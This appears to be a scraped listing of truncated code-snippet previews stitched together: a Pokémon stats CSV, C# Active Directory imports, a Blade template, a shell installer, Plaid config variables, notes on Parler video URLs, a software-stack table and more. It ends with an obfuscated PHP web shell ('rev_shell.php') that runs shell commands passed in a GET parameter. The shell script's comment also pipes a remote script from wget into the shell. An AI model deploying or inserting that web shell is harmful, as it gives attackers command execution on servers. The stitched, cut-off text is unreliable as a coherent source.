This document now exists on the official ASP.NET core docs page.
- Application
- Request Handling
This document now exists on the official ASP.NET core docs page.
Name,Type,Total,HP,Attack,Defense,Sp. Atk,Sp. Def,Speed,url,icon | |
Bulbasaur,"['Grass', 'Poison']",318,45,49,49,65,65,45,https://pokemondb.net/pokedex/bulbasaur,https://img.pokemondb.net/sprites/sword-shield/icon/bulbasaur.png | |
Ivysaur,"['Grass', 'Poison']",405,60,62,63,80,80,60,https://pokemondb.net/pokedex/ivysaur,https://img.pokemondb.net/sprites/sword-shield/icon/ivysaur.png | |
Venusaur,"['Grass', 'Poison']",525,80,82,83,100,100,80,https://pokemondb.net/pokedex/venusaur,https://img.pokemondb.net/sprites/sword-shield/icon/venusaur.png | |
Charmander,"['Fire', '']",309,39,52,43,60,50,65,https://pokemondb.net/pokedex/charmander,https://img.pokemondb.net/sprites/sword-shield/icon/charmander.png | |
Charmeleon,"['Fire', '']",405,58,64,58,80,65,80,https://pokemondb.net/pokedex/charmeleon,https://img.pokemondb.net/sprites/sword-shield/icon/charmeleon.png | |
Charizard,"['Fire', 'Flying']",534,78,84,78,109,85,100,https://pokemondb.net/pokedex/charizard,https://img.pokemondb.net/sprites/sword-shield/icon/charizard.png | |
Squirtle,"['W |
using System; | |
using System.Collections.Generic; | |
using System.Management; | |
using System.DirectoryServices; | |
using System.DirectoryServices.ActiveDirectory; | |
using System.Text; | |
using System.Runtime.Serialization.Formatters.Binary; | |
using System.IO; | |
using System.Collections; | |
using System.Runtime.InteropServices; |
<x-layout> | |
<x-button class="bg-gray-400 hover:bg-gray-500" onclick="$modals.show('join-modal')">Join</x-button> | |
<x-modals.join /> | |
<script> | |
window.$modals = { | |
show(name) { | |
window.dispatchEvent( | |
new CustomEvent('modal', { detail: name }) |
#!/bin/sh | |
# Copyright 2021 Jonathan Bowman. All documentation and code contained | |
# in this file may be freely shared in compliance with the | |
# Apache License, Version 2.0 (http://www.apache.org/licenses/LICENSE-2.0) | |
# and is **provided "AS IS" without warranties or conditions of any kind**. | |
# | |
# OUT="$(mktemp)"; wget -q -O - https://gist.github.com/bowmanjd/d72e2e89996087f71ffe3e9777dea5a2/raw > $OUT; . $OUT | |
# | |
# You may read a brief synopsis at |
var ( | |
// set constants from env | |
PLAID_CLIENT_ID = os.Getenv("PLAID_CLIENT_ID") | |
PLAID_SECRET = os.Getenv("PLAID_SECRET") | |
PLAID_ENV = os.Getenv("PLAID_ENV") | |
PLAID_PRODUCTS = os.Getenv("PLAID_PRODUCTS") | |
PLAID_COUNTRY_CODES = os.Getenv("PLAID_COUNTRY_CODES") | |
PLAID_REDIRECT_URI = os.Getenv("PLAID_REDIRECT_URI") | |
APP_PORT = os.Getenv("APP_PORT") | |
) |
Let's say you have a video ID, like wfy02V209EwU
taken from this map
The link for the video kiBnNejo0JW0
is at https://video.parler.com/ki/Bn/kiBnNejo0JW0. Notice that the link is: https://video.parler.com/
followed by the first two characters of the video ID, then /
, then the next two characters, another /
, and the video ID.
But if you click on this, you will get an error.
This is because the Parler video servers are still running (as of January 12) but the Domain Name System (DNS) is not running.
Logstash is a free and open server-side data processing pipeline that ingests data from a multitude of sources, transforms it, and then sends it to your favorite "stash."
This section describes how one can use it on UNIX to migrate data from a PostgreSQL database to elasticsearch.
Stack Name | Stack Type | Operating System / Platform | Server | Database | Language or SDK | Framework | UI | Message Bus / Queue | |
---|---|---|---|---|---|---|---|---|---|
AMP | Web (Backend) | Apache | MySQL / MariaDB | Perl / PHP / Python | |||||
BAMP | Web (Backend) | BSD | Apache | MySQL / MariaDB | Perl / PHP / Python | ||||
BAPP | Web (Backend) | BSD | Apache | PostgreSQL | Perl / PHP / Python | ||||
BCHS | Web (Backend) | BSD | SQLite | httpd | C | ||||
DAMP | Web (Backend) | Darwin | Apache | MySQL / MariaDB | Perl / PHP / Python | ||||
ELK | Time Series Data | Logstash | Elasticsearch | Kibana | |||||
ELKB | Time Series Data | Logstash | Elasticsearch | Beats | Kibana | ||||
FAMP | Web (Backend) | FreeBSD | Apache | MySQL / MariaDB | Perl / PHP / Python | ||||
FWAP | Web (Backend) | Windows | Apache | Firebird | Perl / PHP / Python |
<?=`{${~"\xa0\xb8\xba\xab"}["\xa0"]}`; | |
/* | |
* In terminal: | |
* $ echo -ne '<?=`{${~\xa0\xb8\xba\xab}[\xa0]}`;' > rev_shell.php | |
* This is how the code will be produced, \xa0\xb8\xba\xab will be | |
* treated as constant therefore no " needed. It is also not copyable | |
* string because of non-ascii characters | |
* | |
* Explanation: |